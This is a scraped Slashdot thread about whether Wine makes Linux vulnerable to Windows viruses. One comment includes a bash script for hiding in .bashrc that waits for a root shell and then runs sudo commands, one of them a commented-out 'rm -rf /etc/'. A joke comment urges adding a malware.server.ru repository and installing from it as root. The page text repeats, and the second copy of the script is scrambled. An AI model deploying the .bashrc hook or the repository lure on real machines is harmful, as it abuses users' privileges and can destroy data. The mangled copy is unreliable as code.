fsufitch writes "Wine has advanced enough to make Linux not immune to Windows viruses. However, just like many Wine applications, it takes a bit of effort to get the program off the ground. Also, just like some Windows programs running via Wine, not all features may work — in this case, the crippling of the system, immunity to the task manager, identity theft, etc."
Haven't it always been pretty clear that Wine could run Windows viruses, as long as they don't use some weird low-level tricks (which admittedly many do)?
But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing (not the same amount atleast, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.
As long as the OS isn't completely locked down from the user, there will be malware. Windows, Mac, or Linux cant defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.
Haven't it always been pretty clear that Wine could run Microsoft Office, as long as they don't use some weird low-level tricks (which admittedly it does)?
But for that matter, Linux doesn't have MS Office only because it's desktop share is next to nothing (not the same amount atleast, there are Linux office suites out too). Mac OSX has been getting more and more office suites lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.
So WINE can get a virus intended for Windows, if you jump through some hoops to help the virus along. Color me unworried.
What can a Windows-targeted virus in WINE do to a Linux system, other than hang around looking impotent? Most of the target DLLs and other windows hidey-holes don't exist in WINE. Even if it finds a place to lurk, it's unlikely that it could hit the Linux system files or boot loader, or perform keylogging outside WINE or snoop on private files. A very crude "wipe drive C:" type virus might molest your WINE environment (your data files are elsewhere, of course), but that's about all. Even if the virus were specifically tailored for WINE on Linux, a successful attack would rely on user stupidity even more blatant than Windows viruses must depend on.
TFA even commented on how easy it is to dispose of the malware, even after spending some effort helping it to limp onto your system.
The beauty of wine, is that you can configure multiple wine instances which are segregated from each other, so a virus infecting one won't affect another... Also, since wine is a userland program which is only invoked at the user's request, any malware shouldn't be able to make itself load at boot.
Incidentally, small desktop marketshare is not the only reason, windows has traditionally been more susceptible to viruses due to various design decisions which don't apply to linux, various factors like hiding of file extensions, users being admin by default, files being executable purely based on their filename (linux users have to chmod something first), and the basic fact that windows has its origins in a single user gui addon for dos which had no concept of security whatsoever (yes i know nt does, but they grafted the old 9x interface and apis on top, which fundamentally weakened the security model inherent in nt).
You want to know why Linux don't get viruses? You don't get the "Velma" users, that's why. I have a customer we have nicknamed the "walking disaster area" because she will click on ANYTHING that pretends to be a screensaver or comes from one of her friends email addresses, I don't care if the antivirus tries to throw itself between her and the.exe. Just as I had a customer that you could send him ANYTHING with the word 'lesbian" in it, and he would do what? yep, he would run it..Exe,.VBS, you name it, all it had to do was have lesbian somewhere in the title.
So don't worry, you Linux guys get the "Velma" users I'm quite sure your good friends in Nigeria, the RBN, and China will be cooking up "happy_screensaver.sh" and "hot_lesbians_vid.sh" and the clueless will happily run it and spread bugs like the clap. Trust me, as a PC repair guy for more years than I care to count a good 999/1000 Windows bugs can be traced back to PEBKAC.
His command is actually even more complicated than it needs to be (deleting wine and reinstalling it). rm -rf ~/.wine && wine will delete the wine folder and rebuild it without the added pointlessness of reinstalling the binaries.
WTF? Microsoft totally fucked up the principle of least privilege from day one. If they hadn't, the damage done by viruses/worms in the history of personal computing, would have been an order of magnitude less.
The problem is, for a home computer, you are your own sysadmin.
And then the dancing bunnies problem comes into play.
User: "Oooh, I can download this to see dancing bunnies." *downloads and executes malware* Malware: *tries to install* OS: "Malware needs root access to install. Please enter your root password." (Windows version of this would be "Cancel or Allow.") User: *enters root password* Malware: *infects system* OS: *pwned* User: *pwned*
Yeah... but dancing bunnies.... it is a tough call.
Don't underestimate lusers. There are 8 year old girls who know more about computers than their parents.
Why do you think the malware authors chose dancing bunnies and not strippers? Even 8 year old girls who know more about computers than their parents can do stupid things with the right motivation.
The idea of multiuser is to protect one user from another... You wouldn't be able to keylog other users at least, and sending spam is something that identd on unix was supposed to deal with, tho the prevalence of single user systems has rendered ident pretty much totally worthless.
Also, nonroot malware is much easier to remove, especially on unix, because there are only a very limited number of places it can hide on the filesystem, it can't do neat tricks like mark areas of the disk corrupt and hide there, it can't hide in system directories amongst the thousands of other files already there, it cant modify the kernel to hide itself... It will show up in the process list when running, whereas with admin privileges it can easily hide itself to the point that you need to boot from clean media.
Just having SELinux install and enforcing is useless, unless someone has gone through and written proper policies that define the mandatory-access-control limitations. Policies have been written for many service such as Apache, but there is still a dearth of appropriate policies for user apps.
The way Linux software is distributed, makes it much less likely to get a virus. You know how many applications I have downloaded from random websites in the past 2 years for my Linux system? Maybe, 2. All of the rest are in the centrally managed, (hopefully) certified virus-free application repository, which is free for all.
The idea that a Linux user would download random stuff from a torrent or website is a pretty foreign concept. For me, and moth others, if it isn't in the repository, I don't bother - because there is probably something in the repository that suits my needs just as well or better anyway.
You, and the majority of Linux users are delusional. You think malware is only executables. A glitch in any software package -- e.g. Firefox or OpenOffice -- would be enough to add a bash script to.bashrc (or replace the file). This can download and start all the software it wants, unless you set the/home partition noexec. Another attack method would be to append a script to the GNOME startup applications.
Consider appending the following script to.bashrc (no one ever looks in there). Next time you go into your shell and do "sudo su - " or something similar, the script has root privileges (if you use sudo timeouts or no sudo password). #!/bin/bash
MAXAGE=100
while sleep 10; do
pgrep -f -U 0 -P $PPID,$$ && {
# echo parent has a root owned child process
id=$(pgrep -f -U 0 -P $PPID,$$ | head -n1)
# wait $id
age=$(($(date +%s) - $(stat/proc/$id/ -c '%Y')))
if [ "$age" -lt "$MAXAGE" ]; then
# echo the child is young
# evil code here
sudo touch/root/you_were_hacked
# sudo rm -rf/etc/
fi
} done &
With 10+ scripting languages on the average Linux install, the attacker has plenty of choices. Linux is only safer if you use a hardened kernel, SELinux, noexec partitions and read-only binary partitions. Crackers are already laughing about the upcoming, unworried lusers that think their OS is invulnerable.
su when invoked by an admin doesn't need the users password. And sudo can be used to run su without ever getting the root password, so he's basically gotten a root shell only using the password associated with his own loggin. Of course, 'sudo -s' is a much simpler way to get a root shell.
The idea that a Linux user would download random stuff from a torrent or website is a pretty foreign concept. For me, and moth others, if it isn't in the repository, I don't bother - because there is probably something in the repository that suits my needs just as well or better anyway.
Correct - as an educated computer user.
Although there are two scenarios you're forgetting. One is repository/domain hijacking, and the other is something not being available except from an unknown website.
Ex 1: PlayOnLinux (simplifies working with Wine and installing some software - not in the repositories) Ex 2: BackInTime (Gnome) - website disappeared a few weeks back. Domain name available for purchase.
Anyway, as an educated Windows user, I would check review sites like cnet or betanews(or a download site
So what you're saying is that Linux should be just riddled with various types of malware in the server market because it is both the dominant player in that market and is a significant target considering the server market's importance. Reality seems to disagree with you.
by Anonymous Coward
on Saturday October 24, @01:55PM (#29858611)
To be fair, there's a significant effort to install backdoors/trojans on poorly configured linux machines, but the issue is that they're a much more difficult target as servers do not browse websites with IE nor do they open every attachment you send them via email.
What makes most machines insecure is the users, and since a server normally has only 1 very tech-saavy user, the only openings are in poorly configured services. I know that I had phpbb for a long time, and one day I put in a game playing mod (had some goofy things like achievements and little trophies), and I got hacked via a google search.
Fortunately the guy who installed it didn't finish off his attack by clearing his own history, and the server wasn't running as root, so he only got as far as screwing with the main page.
To say that the server market isn't continually targeted is disingenuous. It's just harder because it isn't operated by a ton of idiots (well, most of the time anyway).
If I was teh evil malwares writer, I would target OSX as its users have piles of cash. The trick would be to make your pop-up so beautifully coloured, shaded, animated and raytraced that the style-obsessed mac user would fill in his credit card details immediately.
Except on BSD systems, which only accept arguments before other arguments. This prevents someone from putting a file called -rf in a directory, so when you run rm * the -rf won't be expanded and treated as an argument. If your system doesn't do this, then you should get into the habit of putting -- after the arguments and before the options.
Except on BSD systems, which only accept arguments before other arguments. This prevents someone from putting a file called -rf in a directory, so when you run rm * the -rf won't be expanded and treated as an argument.
Which BSD?
FreeBSD:
[vbox:example]$ ls -l total 0 [vbox:example]$ touch -- file1 file2 file3 file4 -rf [vbox:example]$ mkdir dir [vbox:example]$ ls -l total 2 -rw-r--r-- 1 test test 0 Oct 24 16:16 -rf drwxr-xr-x 2 test test 512 Oct 24 16:16 dir -rw-r--r-- 1 test test 0 Oct 24 16:16 file1 -rw-r--r-- 1 test test 0 Oct 24 16:16 file2 -rw-r--r-- 1 test test 0 Oct 24 16:16 file3 -rw-r--r-- 1 test test 0 Oct 24 16:16 file4 [vbox:example]$ rm * [vbox:example]$ ls -l total 0 -rw-r--r-- 1 test test 0 Oct 24 16:16 -rf
I assume you're talking about a specific shell or rm binary--AFAIK, they all exhibit the same behavior in recent releases.
Ubuntu 9.10 will start sandboxing desktop programs (starts with xpdf i think), other distros do already/will follow. I think that sandboxing can (and if required will) criple malwares abilities (e.g can't listen on network ports, can't insert itself to bootsequence, can't touch chrome tabs that are connected to https sites) leaving them unable to do most malwarey things without permission and can work like an AV that is designed right (e.g warn users that they are about to do something very stupid, only when they are not everytime they run a 3rd party app/widget, without having to scan binaries)
To an extent yes, (seriously mods, moding funny because you disagree?), however AFAIK IEs implementation is in IE not at system level, so it cannot be applied to anything but IE & plugins. OFC this isn't to say that it can't rigorous sandboxing can't be implemented in windows, just that the tech is already in Linux, it just needs the configuration and UI to move it to the dekstop, IMO this would come if there was demand.
however AFAIK IEs implementation is in IE not at system level
You would be incorrect [microsoft.com]. IE uses an OS level service known as Windows Integrity Mechanism [microsoft.com]. Same mechanism used by UAC or Silverlight.
Think of it from a the perspective of the imps making the viruses (and no, it's not 'virii'). Pretend you're a spineless asshole that wants to cause as much damage as possible. Do you use widespread tools to make a Windows virus with relative ease and hit the biggest user base, or do you spend much more time finding vulerabilities in better OS's and hit a much smaller user base?
99 times out of 100 it's the former scenario that plays out. Doesn't mean you needn't run anti-virus software on OS X, for examp
"But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing"
I keep hearing that. Everyone says it so it must be true. But, I'm mindful of the fact that only a handful of viruses have EVER been written for Linux, and that the User can't infect the underlying system. It takes Root access to do so, something that is only now beginning to be true for Windows.
It seems that Windows is improving it's security model - but they still haven't caught up with Linux, despite what the fanboys might have to say. Unlike XP, it has always been possible to lock the User down pretty tightly, but still allow User to play any game on the system. More, it has almost always been possible to allow a User to install his games and applications in User Space. That isn't possible with Windows, even with Win 7. When I can create a dozen users, each of whom allows serious infections WITHIN HIS OWN ACCOUNT, but the Admin account remains untouched and unharmed, THEN Windows will be well on the road to having a meaningful security model.
Whatever - I'll believe the basic premise that Linux would be just as vulnerable as Windows if it had market share when I see it. To me, it seems the structure and the philosophy of Linux contradicts what common "wisdom" says.
My wife runs ubuntu on her laptop. He is away in Malaysia at the moment taking care of family business and she needed to get online. So she goes to this internet cafe and they give her a CAT5 cable which she plugs in. I have set her up with a VPN so comms are secure. She thinks something is wrong so she asks for help. The internet cafe people start stuffing around with network interfaces and she types her password in for them. So now all I know is that she gave these people root access when she had no idea
As long as the OS isn't completely locked down from the user, there will be malware.
If you operate as a non-privileged user, and there aren't gaping local root exploits, malware is pretty damn toothless.
Sure, it could still send out some e-mails, record your keystrokes, etc., but it will show up in `ps` just like any other process, and it will have to launch itself from a few standard few locations available, where it will be easy to find, and stop from running.
So, yes, Linux could have malware, but it would be the minor nuisance type, rather than the "everyone's infected, it's impossible to remove, and the internet is being brought to its knees" type.
Additionally, the problem with Linux viruses is that people get their software from a central repository, with cryptographic checksums and the like. The world would be very different if Windows users got all their software through WindowsUpdate, instead of constantly downloading crap from random websites.
But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing (not the same amount atleast, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as it's marketshare has been growing.
There are more than enough unix and linux machines on the net to make them a viable target yet these machines don't seem have the same problems. They do get cracked but normally due to bad PHP code or people setting guessable passwords.
Windows doesn't get viruses because lots of people use it, it gets viruses because it has a thrown together design and it's poorly implemented.
It's about the marketshare if you ignore the ratios. Macs are supposed to have... 5% marketshare? They and the other OS have a much lower ratio of malware per install. Yes, Windows locked down should be just as secure as any other OS... but it is too easy to change its security for convenience sake --- at least up till XP. I haven't administered a network (or even a machine) of Windows Vista and above, so they may be much better for all I know.
I have been running linux machines for going on 10 years now, including my home, all the computers in my office, dozens of servers with every imaginable piece of software and configuration possible (some secure some insecure) in that time, I as yet to ever find one virus, malware, or evidence that a serious attempt was ever made any progress.
The market share argument just does not cut it. You would think there would be at least one well know case in the wild by now of a linux virus spreading to other linux
A virus run in Wine is akin to taking a ferocious tiger out of the jungle, paralyzing it, then hooking up all of its nerve endings to virtual jungle simulator. It's not a perfect simulation, though, so the jungle maybe doesn't look right, and plus there's an omnipotent power that can change anything that goes on in the simulation, or even destroy it and the tiger's consciousness with a few twitches of his fingers. Now that's power.
Power that's generated by feeding the dead tigers back to other tigers so we can use their body heat to generate MORE POWER!
I always have to configure the programs so much before they run. It really defeats the purpose of a virus if I have to configure it so much first. Once Linux can run Windows viruses with a one-very-poorly-chosen-click install process I might make the switch. Besides, I can just run my FOSS software under Windows and still have access to all of the proprietary viruses that are only made for windows.
If you look deeper to Apple users virtual machines (Sun Virtual Box etc.) , lots of them doesn't bother to install some free AV, a basic one saying "it is virtual anyway". When you talk about how evil things can be done while their virtual machine up and what kind of trouble they may get into if they have bad luck, they install a free AV to Windows.
If you have trouble convincing such people, just use plain logic: It can even run some games let alone a worm/trojan/virus.
I work as a sysadmin at a company making a slow switchover to Linux, and I've experimented with this a bit. You can greatly, greatly limit the damage any virus can cause through wine by unmapping it's Z drive from the wine configuration menu.
By default, wine maps / to Z. I can see why they did this, (wine can only run applications within a mapped drive) but it likely needs to be undone across the board. The best alternative would be to create a unhidden wine folder in the user's home directory and map that in wine.
If Z is left mapped to/, then a windows virus can run rampant all throughout your system.
A virus that is Linux-aware can escape from a WINE sandbox like this very easily. WINE handles Windows library calls, but it can not intercept system calls. If you put a Linux system call number into eax and issue interrupt 80h then you get a Linux system call, irrespective of whether it's a programme running with WINE or a native Linux program. Remember, WINE is not an emulator, it is just a loader and a set of libraries. It doesn't provide any sandboxing. WINE even provides a mechanism for allowing programs to detect if they are running under WINE, so if you can persuade a Linux user to run a program under WINE (or infect another program running under WINE) then you can do anything that the user can do. Unless, of course, you combine WINE with SELinux or some other real sandboxing mechanism.
Users with Office installed seem to end up documents infected with a macro virus.
While the Macs are themselves unaffected, they pass along the infection to windows boxes.
That's usually the point where they are found and removed, but the general lack of av for Mac (few choices and most lack functionality/accuracy) along with the perception of macs as immune means that av is rarely installed on macs.
When it is, AV_App_X doesn't detect the malware, whereas AV_App_Y detects, but can't clean, and AV_App_Z has no realtime scanning.
Thousands of Linux systems now are running windows virus. That new improvement in Wine made a lot of Linux users to intentionally install the last wine version and browse dangerous places using IE6 under it to see if they get lucky and get some virus. "I'm excited", said one linux user, "i managed to get 3 different virus, a worm, and you wont believe, my machine is now part of a botnet! Woohoo!".
Yeah, it can run viruses, but "not all features may work -- in this case, the crippling of the system, immunity to the task manager, identity theft, etc.".
So in fact, it's not a virus anymore. It's just another program. The very point of being a virus is gone. Because the security settings still hold. (Unless you are retarded enough to run a Wine program as root. But in that case you're just asking for it anyway. ^^)
Actually, Wine refuses to run under sudo. I know this because I used to use Windows data recovery programs (that naturally needed root) in Wine on NTFS drives. It used to work surprisingly well.
If it managed to infect the Wine registry well enough that it's run automatically, I will have to go into the Wine registry to remove it manually. Or I could run a couple of simple commands: sudo aptitude purge wine; sudo aptitude install wine;
Wrong. Wine installs stuff in ~/.wine. The above commands don't touch user directories, so he would end up with a fresh system-wide wine installation but the same malware-ridden user config.
Linux isn't THAT more secure, it is just less targeted since Windows is 90%+ of the computers.
A properly configured UNIX client system is significantly more secure than any comparable Windows system, even if you don't run a firewall. There are two significant differences: Internet Explorer, and Services.
The security model of IE is inherently flawed and can not be fixed without breaking existing applications. Microsoft is unwilling to take that step.
Windows services are neither run from a superserver nor in virtually all cases do they allow binding to specific ports, and Windows networking (LAN Manager) requires having services with open ports.
These are fairly significant problems that can not be addressed without changes to Windows APIs that are unlikely to happen.
I think Apple is about to learn a real lesson with the iPhone being hacked constantly.
If someone has physical access to the system, all the software security in the world is useless. The iPhone is being attacked by the device's *owners*. These are *local exploits*, much more common and of much less concern than remote ones.
marketshare (Score:3, Insightful)
Haven't it always been pretty clear that Wine could run Windows viruses, as long as they don't use some weird low-level tricks (which admittedly many do)?
But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing (not the same amount atleast, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.
As long as the OS isn't completely locked down from the user, there will be malware. Windows, Mac, or Linux cant defend you from that. But none of us really want a locked down OS. And as long as the users are stupid their computers will get infected.
It's just about the marketshare.
Re: (Score:3, Funny)
But for that matter, Linux doesn't have MS Office only because it's desktop share is next to nothing (not the same amount atleast, there are Linux office suites out too). Mac OSX has been getting more and more office suites lately as it's marketshare has been growing. So would Linux aswell if it ever gained more users.
As long as the OS isn't completel
Windows virus needs help to limp onto WINE (Score:5, Insightful)
What can a Windows-targeted virus in WINE do to a Linux system, other than hang around looking impotent? Most of the target DLLs and other windows hidey-holes don't exist in WINE. Even if it finds a place to lurk, it's unlikely that it could hit the Linux system files or boot loader, or perform keylogging outside WINE or snoop on private files. A very crude "wipe drive C:" type virus might molest your WINE environment (your data files are elsewhere, of course), but that's about all. Even if the virus were specifically tailored for WINE on Linux, a successful attack would rely on user stupidity even more blatant than Windows viruses must depend on.
TFA even commented on how easy it is to dispose of the malware, even after spending some effort helping it to limp onto your system.
Parent
Re:Windows virus needs help to limp onto WINE (Score:5, Insightful)
The beauty of wine, is that you can configure multiple wine instances which are segregated from each other, so a virus infecting one won't affect another... Also, since wine is a userland program which is only invoked at the user's request, any malware shouldn't be able to make itself load at boot.
Incidentally, small desktop marketshare is not the only reason, windows has traditionally been more susceptible to viruses due to various design decisions which don't apply to linux, various factors like hiding of file extensions, users being admin by default, files being executable purely based on their filename (linux users have to chmod something first), and the basic fact that windows has its origins in a single user gui addon for dos which had no concept of security whatsoever (yes i know nt does, but they grafted the old 9x interface and apis on top, which fundamentally weakened the security model inherent in nt).
Parent
Re:Windows virus needs help to limp onto WINE (Score:5, Funny)
You want to know why Linux don't get viruses? You don't get the "Velma" users, that's why. I have a customer we have nicknamed the "walking disaster area" because she will click on ANYTHING that pretends to be a screensaver or comes from one of her friends email addresses, I don't care if the antivirus tries to throw itself between her and the .exe. Just as I had a customer that you could send him ANYTHING with the word 'lesbian" in it, and he would do what? yep, he would run it. .Exe, .VBS, you name it, all it had to do was have lesbian somewhere in the title.
So don't worry, you Linux guys get the "Velma" users I'm quite sure your good friends in Nigeria, the RBN, and China will be cooking up "happy_screensaver.sh" and "hot_lesbians_vid.sh" and the clueless will happily run it and spread bugs like the clap. Trust me, as a PC repair guy for more years than I care to count a good 999/1000 Windows bugs can be traced back to PEBKAC.
Parent
Re:Windows virus needs help to limp onto WINE (Score:4, Informative)
Parent
Re:marketshare (Score:5, Insightful)
But none of us really want a locked down OS
WTF?
Microsoft totally fucked up the principle of least privilege from day one. If they hadn't, the damage done by viruses/worms in the history of personal computing, would have been an order of magnitude less.
Parent
Re:marketshare (Score:5, Insightful)
The problem is, for a home computer, you are your own sysadmin.
And then the dancing bunnies problem comes into play.
User: "Oooh, I can download this to see dancing bunnies." *downloads and executes malware*
Malware: *tries to install*
OS: "Malware needs root access to install. Please enter your root password." (Windows version of this would be "Cancel or Allow.")
User: *enters root password*
Malware: *infects system*
OS: *pwned*
User: *pwned*
Parent
Re:marketshare (Score:5, Funny)
Parent
Re: (Score:3, Insightful)
Yeah ... but dancing bunnies .... it is a tough call.
Don't underestimate lusers. There are 8 year old girls who know more about computers than their parents.
Why do you think the malware authors chose dancing bunnies and not strippers? Even 8 year old girls who know more about computers than their parents can do stupid things with the right motivation.
Re:marketshare (Score:4, Informative)
The idea of multiuser is to protect one user from another... You wouldn't be able to keylog other users at least, and sending spam is something that identd on unix was supposed to deal with, tho the prevalence of single user systems has rendered ident pretty much totally worthless.
Also, nonroot malware is much easier to remove, especially on unix, because there are only a very limited number of places it can hide on the filesystem, it can't do neat tricks like mark areas of the disk corrupt and hide there, it can't hide in system directories amongst the thousands of other files already there, it cant modify the kernel to hide itself... It will show up in the process list when running, whereas with admin privileges it can easily hide itself to the point that you need to boot from clean media.
Parent
Re: (Score:3, Interesting)
Just having SELinux install and enforcing is useless, unless someone has gone through and written proper policies that define the mandatory-access-control limitations. Policies have been written for many service such as Apache, but there is still a dearth of appropriate policies for user apps.
Linux's distribution model helps though (Score:5, Insightful)
The way Linux software is distributed, makes it much less likely to get a virus. You know how many applications I have downloaded from random websites in the past 2 years for my Linux system? Maybe, 2. All of the rest are in the centrally managed, (hopefully) certified virus-free application repository, which is free for all.
The idea that a Linux user would download random stuff from a torrent or website is a pretty foreign concept. For me, and moth others, if it isn't in the repository, I don't bother - because there is probably something in the repository that suits my needs just as well or better anyway.
Parent
Re:Linux's distribution model helps though (Score:5, Insightful)
You, and the majority of Linux users are delusional. You think malware is only executables. A glitch in any software package -- e.g. Firefox or OpenOffice -- would be enough to add a bash script to .bashrc (or replace the file). This can download and start all the software it wants, unless you set the /home partition noexec.
Another attack method would be to append a script to the GNOME startup applications.
Consider appending the following script to .bashrc (no one ever looks in there). Next time you go into your shell and do "sudo su - " or something similar, the script has root privileges (if you use sudo timeouts or no sudo password).
#!/bin/bash
MAXAGE=100
while sleep 10; do
pgrep -f -U 0 -P $PPID,$$ && { /proc/$id/ -c '%Y'))) /root/you_were_hacked /etc/
# echo parent has a root owned child process
id=$(pgrep -f -U 0 -P $PPID,$$ | head -n1)
# wait $id
age=$(($(date +%s) - $(stat
if [ "$age" -lt "$MAXAGE" ]; then
# echo the child is young
# evil code here
sudo touch
# sudo rm -rf
fi
}
done &
With 10+ scripting languages on the average Linux install, the attacker has plenty of choices. Linux is only safer if you use a hardened kernel, SELinux, noexec partitions and read-only binary partitions. Crackers are already laughing about the upcoming, unworried lusers that think their OS is invulnerable.
Parent
Re:Linux's distribution model helps though (Score:4, Informative)
Parent
Re: (Score:3, Informative)
The idea that a Linux user would download random stuff from a torrent or website is a pretty foreign concept. For me, and moth others, if it isn't in the repository, I don't bother - because there is probably something in the repository that suits my needs just as well or better anyway.
Correct - as an educated computer user.
Although there are two scenarios you're forgetting. One is repository/domain hijacking, and the other is something not being available except from an unknown website.
Ex 1: PlayOnLinux (simplifies working with Wine and installing some software - not in the repositories)
Ex 2: BackInTime (Gnome) - website disappeared a few weeks back. Domain name available for purchase.
Anyway, as an educated Windows user, I would check review sites like cnet or betanews(or a download site
Re:marketshare (Score:4, Insightful)
So what you're saying is that Linux should be just riddled with various types of malware in the server market because it is both the dominant player in that market and is a significant target considering the server market's importance. Reality seems to disagree with you.
Parent
Re:marketshare (Score:5, Insightful)
To be fair, there's a significant effort to install backdoors/trojans on poorly configured linux machines, but the issue is that they're a much more difficult target as servers do not browse websites with IE nor do they open every attachment you send them via email.
What makes most machines insecure is the users, and since a server normally has only 1 very tech-saavy user, the only openings are in poorly configured services. I know that I had phpbb for a long time, and one day I put in a game playing mod (had some goofy things like achievements and little trophies), and I got hacked via a google search.
Fortunately the guy who installed it didn't finish off his attack by clearing his own history, and the server wasn't running as root, so he only got as far as screwing with the main page.
To say that the server market isn't continually targeted is disingenuous. It's just harder because it isn't operated by a ton of idiots (well, most of the time anyway).
Parent
Re:marketshare (Score:4, Insightful)
A link to all those hundreds of OS X viruses that are coming out?
Parent
Re:marketshare (Score:5, Funny)
If I was teh evil malwares writer, I would target OSX as its users have piles of cash. The trick would be to make your pop-up so beautifully coloured, shaded, animated and raytraced that the style-obsessed mac user would fill in his credit card details immediately.
Parent
Re:marketshare (Score:4, Informative)
Parent
Re:marketshare (Score:4, Insightful)
Which BSD?
FreeBSD:
I assume you're talking about a specific shell or rm binary--AFAIK, they all exhibit the same behavior in recent releases.
Parent
not just marketshare (Score:5, Interesting)
Ubuntu 9.10 will start sandboxing desktop programs (starts with xpdf i think), other distros do already/will follow. I think that sandboxing can (and if required will) criple malwares abilities (e.g can't listen on network ports, can't insert itself to bootsequence, can't touch chrome tabs that are connected to https sites) leaving them unable to do most malwarey things without permission and can work like an AV that is designed right (e.g warn users that they are about to do something very stupid, only when they are not everytime they run a 3rd party app/widget, without having to scan binaries)
Parent
Re: (Score:3, Insightful)
You mean just like Internet Explorer has been doing since the End of 2006?
Re: (Score:3, Interesting)
To an extent yes, (seriously mods, moding funny because you disagree?), however AFAIK IEs implementation is in IE not at system level, so it cannot be applied to anything but IE & plugins. OFC this isn't to say that it can't rigorous sandboxing can't be implemented in windows, just that the tech is already in Linux, it just needs the configuration and UI to move it to the dekstop, IMO this would come if there was demand.
Re: (Score:3, Interesting)
You would be incorrect [microsoft.com]. IE uses an OS level service known as Windows Integrity Mechanism [microsoft.com]. Same mechanism used by UAC or Silverlight.
Re: (Score:3, Interesting)
Think of it from a the perspective of the imps making the viruses (and no, it's not 'virii'). Pretend you're a spineless asshole that wants to cause as much damage as possible. Do you use widespread tools to make a Windows virus with relative ease and hit the biggest user base, or do you spend much more time finding vulerabilities in better OS's and hit a much smaller user base?
99 times out of 100 it's the former scenario that plays out. Doesn't mean you needn't run anti-virus software on OS X, for examp
Re:marketshare (Score:5, Insightful)
"But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing"
I keep hearing that. Everyone says it so it must be true. But, I'm mindful of the fact that only a handful of viruses have EVER been written for Linux, and that the User can't infect the underlying system. It takes Root access to do so, something that is only now beginning to be true for Windows.
It seems that Windows is improving it's security model - but they still haven't caught up with Linux, despite what the fanboys might have to say. Unlike XP, it has always been possible to lock the User down pretty tightly, but still allow User to play any game on the system. More, it has almost always been possible to allow a User to install his games and applications in User Space. That isn't possible with Windows, even with Win 7. When I can create a dozen users, each of whom allows serious infections WITHIN HIS OWN ACCOUNT, but the Admin account remains untouched and unharmed, THEN Windows will be well on the road to having a meaningful security model.
Whatever - I'll believe the basic premise that Linux would be just as vulnerable as Windows if it had market share when I see it. To me, it seems the structure and the philosophy of Linux contradicts what common "wisdom" says.
Parent
Re: (Score:3, Interesting)
My wife runs ubuntu on her laptop. He is away in Malaysia at the moment taking care of family business and she needed to get online. So she goes to this internet cafe and they give her a CAT5 cable which she plugs in. I have set her up with a VPN so comms are secure. She thinks something is wrong so she asks for help. The internet cafe people start stuffing around with network interfaces and she types her password in for them. So now all I know is that she gave these people root access when she had no idea
Re:marketshare (Score:5, Insightful)
If you operate as a non-privileged user, and there aren't gaping local root exploits, malware is pretty damn toothless.
Sure, it could still send out some e-mails, record your keystrokes, etc., but it will show up in `ps` just like any other process, and it will have to launch itself from a few standard few locations available, where it will be easy to find, and stop from running.
So, yes, Linux could have malware, but it would be the minor nuisance type, rather than the "everyone's infected, it's impossible to remove, and the internet is being brought to its knees" type.
Additionally, the problem with Linux viruses is that people get their software from a central repository, with cryptographic checksums and the like. The world would be very different if Windows users got all their software through WindowsUpdate, instead of constantly downloading crap from random websites.
Parent
Re: (Score:3, Insightful)
But for that matter, Linux doesn't have malware only because it's desktop share is next to nothing (not the same amount atleast, there are Linux viruses out too). Mac OSX has been getting more and more viruses lately as it's marketshare has been growing.
There are more than enough unix and linux machines on the net to make them a viable target yet these machines don't seem have the same problems. They do get cracked but normally due to bad PHP code or people setting guessable passwords.
Windows doesn't get viruses because lots of people use it, it gets viruses because it has a thrown together design and it's poorly implemented.
Re: (Score:3, Insightful)
It's about the marketshare if you ignore the ratios. Macs are supposed to have ... 5% marketshare? They and the other OS have a much lower ratio of malware per install. Yes, Windows locked down should be just as secure as any other OS... but it is too easy to change its security for convenience sake --- at least up till XP. I haven't administered a network (or even a machine) of Windows Vista and above, so they may be much better for all I know.
Re: (Score:3, Insightful)
Windows, however, is bigger overall.
And you don't really need a beefy server in your botnet. A desktop will do just fine.
Re: (Score:3, Interesting)
I have been running linux machines for going on 10 years now, including my home, all the computers in my office, dozens of servers with every imaginable piece of software and configuration possible (some secure some insecure) in that time, I as yet to ever find one virus, malware, or evidence that a serious attempt was ever made any progress.
The market share argument just does not cut it. You would think there would be at least one well know case in the wild by now of a linux virus spreading to other linux
It's like a what? (Score:4, Interesting)
A virus run in Wine is akin to taking a ferocious tiger out of the jungle, paralyzing it, then hooking up all of its nerve endings to virtual jungle simulator. It's not a perfect simulation, though, so the jungle maybe doesn't look right, and plus there's an omnipotent power that can change anything that goes on in the simulation, or even destroy it and the tiger's consciousness with a few twitches of his fingers. Now that's power.
Power that's generated by feeding the dead tigers back to other tigers so we can use their body heat to generate MORE POWER!
On second thought, lets stick to car analogies.
Just waiting for this e-mail (Score:5, Funny)
This is a lonesome linux virus. Please add
deb http://malware.server.ru/debian [server.ru] experimental non-free
to your /etc/apt/sources.list and excecute "apt-get my-first-virus" as root. Thank you very much vor your cooperation.
Re:Just waiting for this e-mail (Score:5, Funny)
non-free?
I only install FLOSS malware.
Parent
Re:Just waiting for this e-mail (Score:4, Funny)
Me too, I won't compromise my freedom just to be part of a botnet.
Free alternative: http://www.gnu.org/fun/jokes/evilmalware.html
Parent
Re: (Score:3, Funny)
This is a lonesome linux virus. Please add
deb http://malware.server.ru/debian [server.ru] experimental non-free
to your /etc/apt/sources.list and excecute "apt-get my-first-virus" as root. Thank you very much vor your cooperation.
Yeah, I run Fedora...
Linux on a bender (Score:5, Funny)
What do you expect when Linux gets drunk on Wine and wakes up with Windows it's bound to have caught something.
That's the problem with Wine... (Score:5, Funny)
Look to Apple users using VM (Score:5, Interesting)
If you look deeper to Apple users virtual machines (Sun Virtual Box etc.) , lots of them doesn't bother to install some free AV, a basic one saying "it is virtual anyway". When you talk about how evil things can be done while their virtual machine up and what kind of trouble they may get into if they have bad luck, they install a free AV to Windows.
If you have trouble convincing such people, just use plain logic: It can even run some games let alone a worm/trojan/virus.
It is not in the culture you know...
Experiments (Score:4, Informative)
Re:Experiments (Score:5, Informative)
Parent
Mac Office was a bigger headache for me (Score:3, Interesting)
Users with Office installed seem to end up documents infected with a macro virus.
